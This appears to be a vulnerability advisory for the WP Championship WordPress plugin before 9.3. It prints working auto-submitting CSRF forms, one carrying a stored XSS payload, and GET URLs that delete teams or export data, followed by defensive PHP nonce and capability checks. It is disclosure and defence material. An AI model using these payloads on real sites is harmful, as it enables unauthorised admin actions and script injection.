wpexploit | Daniel Ruf | WPEX-ID: 02D25736-C796-49BD-B774-66E0E3FCF4C9
Jun 16, 2022 - 12:00 a.m.

WP Championship < 9.3 - Multiple CSRF

2022-06-16 00:00:00
Daniel Ruf
124
wordpress
championship
csrf
security
form
admin
script

EPSS

0.001

Percentile

26.3%

The plugin is lacking CSRF checks in various places, allowing attackers to make a logged-in admin perform unwanted actions, such as creating and deleting arbitrary teams as well as updating the plugin's settings. Due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues.

<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin_team.php#" method="POST">
    <input type="text" name="action" value="addteam">
    <input type="text" name="team_name" value="<img src=x onerror=alert(/XSS/)>">
    <input type="text" name="team_shortname" value="test">
    <input type="text" name="team_icon" value="b">
    <input type="text" name="group" value="A">
    <input type="text" name="qualified" value="0">
    <input type="text" name="penalty" value="0">
    <input type="hidden" id="submit" name="submit" value="Mannschaft hinzufügen »">
</form>
<script>
HTMLFormElement.prototype.submit.call(
    document.getElementById("test")
);
</script>


https://example.com/wp-admin/admin-ajax.php?action=wpc_export&dlmode=true&exmode=team&fnmode=false


<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="deltables_ok" value="1">
    <input type="text" name="deltables" value="Tabellen entfernen »">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin.php?page=wp-championship%2Fcs_admin.php#" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="cs_groups" value="8">
    <input type="text" name="cs_pts_winner" value="3">
    <input type="text" name="mailservice_ok" value="1">
    <input type="text" name="mailservice1" value="Mailservice auslösen »">
    <input type="text" name="cs_pts_looser" value="0">
    <input type="text" name="cs_pts_deuce" value="1">
    <input type="text" name="cs_group_teams" value="2">
    <input type="text" name="cs_pts_tipp" value="1">
    <input type="text" name="cs_pts_tendency" value="1">
    <input type="text" name="cs_stellv_schalter" value="1">
    <input type="text" name="cs_pts_supertipp" value="5">
    <input type="text" name="cs_modus" value="1">
    <input type="text" name="cs_pts_champ" value="1">
    <input type="text" name="cs_oneside_tendency" value="0">
    <input type="text" name="cs_pts_oneside" value="0">
    <input type="text" name="cs_reminder_hours" value="">
    <input type="text" name="cs_goalsum" value="-1">
    <input type="text" name="cs_rank_trend" value="1">
    <input type="text" name="cs_final_winner" value="-1">
    <input type="text" name="cs_pts_goalsum" value="0">
    <input type="text" name="cs_floating_link" value="1">
    <input type="text" name="cs_joker_idlist" value="">
    <input type="text" name="cs_joker_player" value="">
    <input type="text" name="cs_number_of_tippdays" value="">
    <input type="text" name="cs_xmlrpc_news" value=" ">
</form>
<script>
    document.getElementById("test").submit();
</script>


https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_team.php&action=remove&tid=1
https://example.com/wp-admin/admin.php?page=wp-championship/cs_admin_finals.php&action=remove&mid=1
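As an added defender-side example (not the plugin's own code), the following hypothetical WordPress handlers show the nonce and capability checks whose absence the advisory describes, for the admin team form and the wpc_export AJAX action, together with sanitising the team name on input and escaping it on output. The wpc_example_ function names and the nonce action names are assumptions.

```php
<?php
// Added example, not the plugin's code: hypothetical handlers showing the
// WordPress nonce + capability + sanitisation pattern the advisory says is missing.

// Form rendering: emit a nonce bound to a specific action name.
function wpc_example_render_team_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=wp-championship/cs_admin_team.php' ) ); ?>">
        <?php wp_nonce_field( 'wpc_addteam', 'wpc_addteam_nonce' ); ?>
        <input type="hidden" name="action" value="addteam">
        <input type="text" name="team_name">
        <?php submit_button( 'Mannschaft hinzufügen »' ); ?>
    </form>
    <?php
}

// Form handling: refuse the request unless the nonce is valid and the user may manage options.
function wpc_example_handle_team_form() {
    if ( ! isset( $_POST['action'] ) || 'addteam' !== $_POST['action'] ) {
        return;
    }
    // check_admin_referer() stops with a 403 page when the nonce is missing or invalid;
    // a form posted from another origin cannot carry a valid nonce.
    check_admin_referer( 'wpc_addteam', 'wpc_addteam_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wp-championship' ), 403 );
    }
    // Sanitise on input ...
    $team_name = sanitize_text_field( wp_unslash( $_POST['team_name'] ?? '' ) );
    // ... and escape on output, so stored markup is rendered as text, not executed.
    echo '<p>' . esc_html( $team_name ) . '</p>';
}
add_action( 'admin_init', 'wpc_example_handle_team_form' );

// AJAX handler: check_ajax_referer() verifies the nonce sent in the _ajax_nonce
// (or _wpnonce) field and terminates the request with -1 / 403 on failure.
function wpc_example_export_handler() {
    check_ajax_referer( 'wpc_export' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_send_json_success( array( 'exported' => true ) );
}
add_action( 'wp_ajax_wpc_export', 'wpc_example_export_handler' );
```

The nonce for the AJAX call is created with wp_create_nonce( 'wpc_export' ) and passed to the browser via wp_localize_script() or a hidden field, so only a request issued from the plugin's own admin page carries a value that check_ajax_referer() accepts.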
